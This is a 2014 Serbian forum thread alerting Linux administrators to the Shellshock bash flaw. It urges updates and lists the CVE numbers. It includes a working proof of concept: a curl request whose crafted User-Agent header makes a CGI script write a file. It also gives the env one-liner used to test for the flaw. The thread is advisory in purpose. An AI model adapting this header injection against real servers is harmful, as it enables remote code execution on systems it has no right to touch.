MyCity » Zaštita od zlonamernih programa -> Propusti i ažuriranja » Shellsock - bash remote code execution

Shellsock - bash remote code execution

Napisano na dan: 25.9.2014

Shellsock - bash remote code execution
Sledeća strana Pagination

Idi na vrh

Poslao: 25 Sep 2014 15:52
Idi na vrh
offline
  • Pridružio: 26 Avg 2005
  • Poruke: 384
  • Gde živiš: Beograd

Samo malo obavestenje za sve Linux admine juce je otkriveno da su sve verzije bash-a ranjive. Update jako preporucljiv.
Vise info-a
[Link mogu videti samo ulogovani korisnici]
random primer sa neta:


[root@host cgi-bin]# rm -fr /tmp/aa
[root@host cgi-bin]# cat /var/www/cgi-bin/hi
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "hai"
[root@host cgi-bin]# curl -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa'  https://localhost/cgi-bin/hi
hai
[root@host cgi-bin]#  tail -n1 /var/log/httpd/ssl_access_log
::1 - - [24/Sep/2014:18:22:05 +0200] "GET /cgi-bin/hi HTTP/1.1" 200 4 "-" "() { :;}; echo aa>/tmp/aa"
[root@host cgi-bin]#  ls -l /tmp/aa
-rw-r--r--. 1 apache apache 3 24 sept. 18:22 /tmp/aa



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
Poslao: 28 Sep 2014 08:56
Idi na vrh
offline
  • Pridružio: 17 Jan 2014
  • Poruke: 573
  • Gde živiš: Ulm , Germany

Napisano: 26 Sep 2014 14:20

pogodjeni su i osx i uniix systemi sa ovim
kod ubuntu-a (svih verzija) fix ce biti implementiran putem redovnog update-a
inace, ova "rupa" je prisutna vec duzi niz godina ali opet je tesko koristiti dati propust jer korisnik sam mora da napravi fajl u /var folderu

Dopuna: 28 Sep 2014 8:55

test komanda za proveru je:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
postoje 4 ranjivost koje su javne i jedna koja se tek utvrdjuje.
CVE-2014-6271
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187

CVE-2014-6277

detaljniji test vrsi skripta:
script by hannob

ne bi bilo lose da OP promeni naziv teme u #shellsock ili #bashbug



Poslao: 28 Sep 2014 09:18
Idi na vrh
offline
  • bocke  Male
  • Moderator foruma
  • Glavni moderator Linux foruma
  • Veliki Pingvin
  • Guru
  • Pridružio: 16 Dec 2005
  • Poruke: 12564
  • Gde živiš: Južni pol

Pošto imamo forum koji se malo ozbiljnije bavi propustima, premeštam temu tamo.

MyCity » Zaštita od zlonamernih programa -> Propusti i ažuriranja » Shellsock - bash remote code execution

Ko je trenutno na forumu
 

Ukupno su 1166 korisnika na forumu :: 67 registrovanih, 9 sakrivenih i 1090 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 20624 - dana 04 Apr 2026 04:18

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: aleph_one, Arsenije, asdfjklc, Asteker, avijacija, Banovo Brdo, Black Luster Soldier, Bojan198527, bojanM84, Bolencebl, BOXRR, Bubimir, bunker, celik, cinoeye, Colt D, Crazzer, Deki Duga Devetka, desmeki, Dimitrise93, DM1994, Dukelander, Dusko_Dugousko, Foxdie, GH69, Ir, ivran064, Jager715510, janezek67, JOntra, kikisp, Koser, Lep1na, ljiljak, LostInSpaceandTime, mercedesamg, Mickey91, miki kv, Miki01, Miler88, MILO-VAN, Milometer, Milos ZA, moldway, mrgud2025, Pero, Piani Jazzer, prasinar, Radio operater, radza1, Rebel Frank, Rogan33, rokokoko, samp1389, ShurikSST, stegonosa, tomigun, US_Rank_0, Van, VJ, Vlada78, voja64, Vojkan Petrovic, vrlenija, WELJKO, zeka013, ZlatniRez